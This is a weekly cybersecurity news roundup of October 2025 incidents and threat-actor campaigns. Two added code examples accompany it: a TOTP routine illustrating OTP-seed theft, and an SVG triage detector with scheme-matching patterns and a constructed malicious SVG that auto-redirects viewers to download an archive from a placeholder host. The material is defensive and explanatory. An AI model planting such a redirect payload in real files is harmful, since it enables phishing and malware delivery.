Cyber Security Week in Review: October 3, 2025

A months-long cyberattack on FEMA compromised sensitive data belonging to both FEMA and US Customs and Border Protection (CBP) employees. The hacker installed VPN software to exfiltrate data. Initial access came through the CitrixBleed 2.0 vulnerability (CVE-2025-5777), an out-of-bounds memory read in Citrix NetScaler ADC and Gateway that leaks session tokens and other credentials from memory, letting the attacker hijack authenticated sessions and so bypass multi-factor authentication.

A previously undetected smishing campaign has been abusing industrial cellular routers manufactured by Milesight to deliver phishing messages across Europe. The campaign, active since at least February 2022, leverages a vulnerability tracked as CVE-2023-43261. It allows threat actors to extract system logs from vulnerable Milesight routers, crack encrypted administrator credentials, and gain unauthorized access to the device’s SMS-sending capabilities.

The Akira ransomware group is evolving its tactics, targeting SonicWall SSL VPN devices and breaching networks even with OTP-based multi-factor authentication enabled. Arctic Wolf researchers observed successful logins despite OTP prompts, suggesting attackers may be using stolen OTP seeds or another method to generate valid tokens. The attacks follow earlier reports of Akira exploiting SonicWall devices, now linked to CVE-2024-40766, an access control flaw disclosed in September 2024.
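The Arctic Wolf observation above rests on a simple property of OTP-based MFA: the code is a deterministic function of a shared seed and the clock, so whoever holds the seed produces the same codes as the legitimate authenticator. The following RFC 6238 implementation is an added example, not code from the original roundup or from Arctic Wolf's report; the seed and timestamps are the published RFC 4226/6238 test vectors, not a real device's secret, and the verification routine is a generic one written here, not SonicWall's.

```python
"""RFC 6238 TOTP computed from a raw seed (added example, not from the page).

Demonstrates why a stolen OTP seed defeats OTP-based MFA: the server-side
check cannot tell a code computed by the victim's authenticator app from one
computed by an attacker holding the same seed.
"""
import hashlib
import hmac
import struct
import time

# RFC 4226 / RFC 6238 Appendix B test secret (ASCII digits 1..0 twice), SHA-1.
RFC6238_SEED = b"12345678901234567890"


def hotp(seed, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226 HOTP: HMAC(seed, 8-byte big-endian counter), dynamic truncation."""
    mac = hmac.new(seed, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "{:0{}d}".format(code % (10 ** digits), digits)


def totp(seed, unix_time, step=30, digits=6, digestmod=hashlib.sha1):
    """RFC 6238 TOTP: HOTP over the time-step counter floor(T / step)."""
    return hotp(seed, int(unix_time) // step, digits, digestmod)


def verify_totp(seed, submitted, unix_time, window=1, step=30, digits=6):
    """Generic server-side check (assumed, not any vendor's): compare the
    submitted code against the current step and +/- `window` neighbouring
    steps for clock skew, in constant time. Returns True on a match.
    An attacker who holds `seed` passes this check exactly as the user does."""
    counter = int(unix_time) // step
    for drift in range(-window, window + 1):
        expected = hotp(seed, counter + drift, digits)
        if hmac.compare_digest(expected, submitted):
            return True
    return False


def seed_theft_scenario(seed, unix_time):
    """Victim's app and attacker compute the code independently from the
    same seed; the verifier accepts both. Returns (victim, attacker, accepted)."""
    victim_code = totp(seed, unix_time)
    attacker_code = totp(seed, unix_time)  # attacker only needs the seed + clock
    return victim_code, attacker_code, verify_totp(seed, attacker_code, unix_time)


if __name__ == "__main__":
    now = time.time()
    print("T=59 (RFC vector, 8 digits):", totp(RFC6238_SEED, 59, digits=8))
    print("seed-theft scenario now:", seed_theft_scenario(RFC6238_SEED, now))
```

The practical consequence is that seed material (enrollment QR codes, authenticator backups, exported secrets on a compromised endpoint or appliance) must be handled as a credential, and a seed suspected stolen can only be invalidated by re-enrolling the user; phishing-resistant FIDO2 authenticators avoid the shared-secret model entirely.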

A report from PicusSecurity details activities of RomCom (aka Storm-0978, Tropical Scorpius, and Void Rabisu), a hybrid threat actor known for its attacks on Ukraine, as well as financial, manufacturing, defense, and logistics sectors in Europe and Canada. In 2025, RomCom exploited the WinRAR path traversal flaw (CVE-2025-8088) to deploy the SnipBot, RustyClaw, and Mythic Agent backdoors. The group has previously exploited other zero-day vulnerabilities, such as CVE-2023-36884 in Microsoft Word and CVE-2024-9680 in Firefox, to gain unauthorized access to systems.

Ukraine’s national cyber incident response team (CERT-UA) has released a report on Russian cyber operations in early 2025. Attacks on local governments rose slightly (from 32% to 34% of incidents), and incidents affecting the defense sector increased from 19% to 23%. Overall, however, malware, phishing, and account compromises decreased. Active threats included the groups UAC-0218, UAC-0219, UAC-0226, and UAC-0227, along with major actors such as UAC-0001 (APT28) and UAC-0002 (Sandworm/APT44) together with its subcluster UAC-0125.

A new phishing campaign targets Ukrainian government agencies by impersonating the National Police of Ukraine. Malicious SVG files in emails trigger the download of a password-protected ZIP containing a CHM file, which installs CountLoader. CountLoader then delivers Amatera Stealer and PureMiner malware.
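SVG is XML and may carry scripts, event handlers and links, which is what makes it usable as the first stage of the chain described above. The triage function below is an added example, not code from the original roundup or from the campaign write-up: it statically flags SVG attachments that can run code or redirect the viewer. The two sample files are constructed here for illustration and are not campaign artifacts; the hostname used in them is a placeholder.

```python
"""Static triage of SVG attachments for script or redirect capability.

Added example, not from the page. Flags SVG content that is active rather
than a plain image: <script> and embedding elements, on* event handlers, and
href/xlink:href values carrying a URL scheme (javascript:, data:, http(s):).
"""
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
RISKY_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "set", "animate"}
RISKY_SCHEME = re.compile(r"^\s*(javascript|data|https?|vbscript):", re.IGNORECASE)


def _local(qualified):
    """Strip an ElementTree '{namespace}' prefix from a tag or attribute name."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(svg_text):
    """Return a sorted list of reasons an SVG looks active. Empty means none.

    A parse failure is returned as a finding rather than raised: a malformed
    attachment in a mail pipeline is itself worth a second look.
    """
    findings = set()
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return ["unparseable: {}".format(exc)]
    for el in root.iter():  # includes the root element itself
        name = _local(el.tag)
        if name in RISKY_TAGS:
            findings.add("element:" + name)
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.lower().startswith("on"):  # onload, onclick, onerror, ...
                findings.add("event-handler:" + a)
            if (attr == XLINK_HREF or a == "href") and RISKY_SCHEME.match(value):
                findings.add("href-scheme:" + value.split(":", 1)[0].strip().lower())
    return sorted(findings)


def is_suspicious(svg_text):
    return bool(svg_findings(svg_text))


# Constructed sample: an "image" that redirects the viewer to an archive download.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="window.location='https://example.invalid/document.zip'">
  <script>window.location = 'https://example.invalid/document.zip';</script>
  <a xlink:href="https://example.invalid/document.zip"><text y="20">Open document</text></a>
</svg>"""

# Constructed sample: a plain vector drawing with no active content.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#36c"/>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("malicious sample", MALICIOUS_SVG), ("benign sample", BENIGN_SVG)):
        print(label, "->", svg_findings(sample))
```

Fragment references such as `href="#gradient"` are left alone, since they are how ordinary SVGs reference their own definitions. For untrusted input at scale, parse with `defusedxml` rather than the stdlib parser to rule out entity-expansion attacks, and treat any non-empty finding as grounds to block or sandbox the attachment rather than render it.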

A cyber espionage campaign has been observed by CERT-UA that uses malicious Microsoft Excel add-ins (XLL files) to deliver a new backdoor tracked as ‘CABINETRAT.’ CERT-UA attributed the activity to a threat cluster it monitors as UAC-0245. According to the agency, the threat actors distributed the XLL payloads inside ZIP archives shared via the Signal messaging app and disguised as a document about people detained after attempting to cross the Ukrainian border.

Okta Threat Intelligence found that North Korean workers are using fake identities to apply for remote jobs in many industries. Their goal is to earn money and send it back to the North Korean government. North Koreans are no longer just applying for IT jobs but are also going after finance and engineering roles. The research tracked over 130 fake identities linked to more than 6,500 job interviews at about 5,000 companies between 2021 and mid-2025.

Fortinet's FortiGuard Labs released a write-up on the Confucius group, a cyber-espionage actor active mainly in South Asia. First spotted in 2013, it has consistently targeted government, military, and critical industries, particularly in Pakistan, using spear-phishing and malicious documents for initial access. More recently, the threat actor has changed its tactics, which now include the use of weaponized Office documents, malicious LNK files, and advanced custom malware like Python-based RATs. The group has been observed shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor.

SideWinder APT, another highly active state-backed hacker group known for targeting South Asia, has launched a targeted operation, tracked as ‘Operation SouthNet’ by Hunt.io, that uses free hosting platforms (Netlify, pages.dev, workers.dev, b4a.run) to deploy credential-harvesting portals and weaponized lure documents. The campaign is aimed at government and military entities in Pakistan and Sri Lanka, with supporting activity touching Nepal, Bangladesh, and Myanmar.

A malware campaign run by the threat actor tracked as ‘Detour Dog’ has infected tens of thousands of websites, using DNS to secretly redirect visitors and execute remote content. Active since August 2023, the malware targets users based on location and device type. Infoblox says that Detour Dog was involved in spreading the Strela Stealer malware in mid-2023, hosting the backdoor StarFish and distributing the stealer via compromised sites and DNS TXT records. The campaign used botnets like REM Proxy and Tofsee to deliver malicious emails.

NVISO Labs has analyzed recently observed activities by Lunar Spider (aka Gold SwathMore), a Russian-speaking financially motivated group behind IcedID/BokBot. The group shifted to a new MaaS called Latrodectus after IcedID’s disruption in May 2024. The threat actor compromises vulnerable websites via CORS misconfigurations and injects JavaScript that overlays the site with a fake CAPTCHA in an iframe and reports victim clicks to a Telegram channel.

Separately, NVISO has warned that China-linked threat actors have been exploiting a recently patched local privilege escalation flaw in Broadcom’s VMware Tools and VMware Aria Operations since mid-October 2024. Tracked as CVE-2025-41244, the vulnerability affects multiple VMware products, including VMware Cloud Foundation (4.x, 5.x, 9.x.x.x and 13.x.x.x), VMware vSphere Foundation (9.x.x.x and 13.x.x.x), VMware Aria Operations 8.x, VMware Tools (11.x.x, 12.x.x, 13.x.x), VMware Telco Cloud Platform (4.x, 5.x) and Telco Cloud Infrastructure (2.x, 3.x).

Speaking of China-aligned threat actors, a previously unknown China-linked hacker group, dubbed ‘Phantom Taurus’, has spent over two years conducting stealthy cyber espionage across government and telecom sectors in Africa, the Middle East, and Asia, according to Palo Alto Networks’ Unit 42. The group uses a custom .NET malware suite called NET-STAR to target IIS servers, along with backdoors that maintain encrypted C2 channels and enable in-memory payload execution.

A new Cisco Talos report examines UAT-8099, a Chinese-speaking cybercrime group that uses search engine optimization (SEO) fraud to steal sensitive data such as credentials, configuration files, and certificates. The group primarily targets high-value Internet Information Services (IIS) servers in countries including India, Thailand, Vietnam, Canada, and Brazil, with victims including universities, tech companies, and telecom providers. UAT-8099 manipulates search rankings by compromising reputable servers and uses tools such as web shells, Cobalt Strike, BadIIS malware, and custom automation scripts to maintain persistence, evade detection, and hide its activities.

A major data leak has exposed sensitive information about the Iranian cyber-espionage group Charming Kitten, also known as APT35. A group calling itself KittenBusters published multiple archives on GitHub, revealing the group's malware tools, past cyberattacks, and identities of alleged members. The leak names dozens of individuals working for front companies linked to APT35 and identifies the group's leader as Abbas Hossein. APT35 has previously been linked to Unit 1500 of Iran's Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).

Two Android spyware campaigns, dubbed ‘ProSpy’ and ‘ToSpy,’ are impersonating popular messaging apps like Signal and ToTok to infiltrate users’ devices in the United Arab Emirates (UAE). The attacks use social engineering and fake websites mimicking legitimate app pages to trick users into manually downloading spyware-laden APK files. Once installed, the malicious apps gain persistent access and silently exfiltrate sensitive data such as contacts, SMS messages, device information, media files, and chat backups.

A new Android banking trojan called ‘Klopatra’, disguised as an IPTV and VPN app, has infected over 3,000 devices across Europe. It enables real-time screen monitoring, input capture, and remote control via hidden VNC. Developed by a likely Turkish-speaking cybercrime group, Klopatra steals banking credentials, keystrokes, and cryptocurrency wallet data. It is possible that Klopatra operates as a private botnet with a limited set of affiliates and is not offered as a public MaaS.

Trend Micro has uncovered an active campaign spreading malware via WhatsApp through a ZIP file attachment that, once executed, hijacks the victim’s account to send itself to all contacts. The phishing message contains the malicious file attachment that requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers. Once opened, the malware automatically propagates via WhatsApp Web, causing infected accounts to be banned due to excessive spam activity. The campaign appears to have been focused on Brazil, with organizations in government, public service, manufacturing, technology, education, and construction sectors being targeted.

Cybersecurity researchers have spotted what is believed to be the first malicious use of a Model Context Protocol (MCP) server in the wild. The rogue code was found hidden within an npm package named ‘postmark-mcp,’ which mimicked a legitimate Postmark Labs library used for managing emails with AI assistants.

Varonis researchers have detailed a new phishing and malware toolkit dubbed ‘MatrixPDF,’ which turns regular PDFs into interactive lures, bypassing email security to steal credentials or deliver malware. Though marketed as a phishing simulation tool, it was first spotted on cybercrime forums, with sellers also using Telegram.

A hacking group calling itself the Crimson Collective claims to have breached Red Hat’s private GitHub repositories, stealing nearly 570GB of compressed data spread across over 28,000 internal projects. The group claims it accessed approximately 800 Customer Engagement Reports (CERs), internal consulting documents that often contain sensitive client information. The hackers tried to extort Red Hat, but reportedly got no answer.

Oracle has linked an ongoing extortion campaign by the Clop ransomware gang to vulnerabilities in its E-Business Suite (EBS) that were patched in July 2025. While Oracle hasn't definitively attributed the attacks to Clop, Chief Security Officer Rob Duhart confirmed customers have received extortion emails from the group. The company didn’t specify which vulnerability was exploited.

Mandiant and the Google Threat Intelligence Group (GTIG) reported that executives at several companies have received ransom emails threatening to leak sensitive data allegedly stolen from their Oracle E-Business Suite systems. According to GTIG’s principal threat analyst Austin Larsen, the extortion attempts began on or before September 29, 2025.

Two 17-year-old Dutch boys have been arrested on suspicion of spying for Russia using hacking devices near sensitive locations in The Hague, including the offices of Europol, Eurojust, and the Canadian embassy. The teens allegedly used a WiFi sniffer, an electronic device designed to detect and intercept wireless networks, to gather intelligence while walking near secure international buildings. One boy was arrested while finishing his homework at home, with his parents reportedly unaware of his activities.

A Chinese national has been convicted for involvement in a fraudulent cryptocurrency scheme following the largest cryptocurrency seizure in global history, valued at more than £5.5 billion ($7.3 billion). Zhimin Qian, 47, also known as Yadi Zhang, pleaded guilty to acquiring and possessing criminal property under the Proceeds of Crime Act. Qian was behind a vast fraudulent Bitcoin investment scheme that defrauded over 128,000 victims in China between 2014 and 2017.

China has sentenced 11 members of the notorious Ming crime family to death for operating cyber scam compounds in Myanmar. Five others received suspended death sentences, 11 were given life sentences, and 12 more received prison terms ranging from five to 24 years. The group was arrested in November 2023 as part of China’s crackdown on scams targeting its citizens. Operating from Myanmar's Kokang region, the Ming family trafficked people into prison-like compounds to run illegal gambling and online fraud schemes, generating at least $1.4 billion between 2015 and 2023.